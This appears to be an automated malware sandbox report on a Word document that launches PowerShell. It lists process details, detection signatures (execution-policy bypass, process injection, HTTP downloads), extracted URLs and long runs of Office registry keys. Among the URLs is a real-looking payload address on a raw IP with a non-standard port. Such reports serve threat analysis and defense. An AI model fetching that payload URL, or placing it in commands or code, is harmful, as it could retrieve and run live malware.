Time:	09:31:31
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7403e0000
Modulesize:	65536
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Windows Processes Suspicious Parent Directory	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	3968
Target ID:	16
Parent PID:	3380
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	09:31:35
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff66e660000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://schemas.openxmlfo

unknown

http://147.78.46.40:37662

unknown

http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt

147.78.46.40

http://147.78.46.40:37662/xsSpQbS

unknown

http://147.78.46.40:43891/page164

unknown

http://nuget.org/NuGet.exe

unknown

http://www.apache.org/licenses/LICENSE-2.0

unknown

http://147.78.46.40:37662(

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

http://www.mcrosoft.com

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

https://g.live.com/odclientsettings/ProdV21C:

unknown

http://crl.ver)

unknown

http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt

unknown

https://github.com/Pester/Pester

unknown

https://g.live.com/odclientsettings/Prod1C:

unknown

http://crl.microsoftK8

unknown

http://147.78.46.40:37662/xsSpQbSP

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://oneget.orgX

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://oneget.org

unknown

http://147.78.46.40:37662P

unknown

There are 18 hidden URLs, click here to show them.

IPs

Domain

Country

Malicious

147.78.46.40

unknown

Lebanon

Details

IP:	147.78.46.40
TargetID:	14
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Lebanon
Countrycode:	LBN
ASN number:	48847
ASN name:	CONNECTLB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
HTTP GET or POST without a user agent	Networking
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

127.0.0.1

unknown

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4368

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

711

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards

PageSize

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings

Template

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

AutoRecoverySaveIntervalMetadata

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

Language

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

EcsRequestPending

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

SubscriptionCustomerLicenseInfo

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

FirstRun

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

ACUpdated

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

DefaultKerningLigatures

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF

Word_RequireForceRefreshAtBoot

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

e91

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride

{30CAC893-3CA4-494C-A5E9-A99141352216}

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData

winword.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

FileTypeBlockList

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

OoxmlConverterBlockList

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\3B018

3B018

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word

WordName

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

BuildNumber

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.22

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.23

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.24

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.25

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.26

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.27

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.28

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.29

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

VersionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ETag

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

DeferredConfigs

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ConfigIds

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTimeWord

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTimeWord

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

ClockTimeSeconds

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

TickCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile

MsaDevice

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries

UpdateComplete

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common

SessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4368

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

FilePath

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

StartDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

EndDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4368

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4368

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4368

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property

0018000DDABBE6B3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceTicket

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

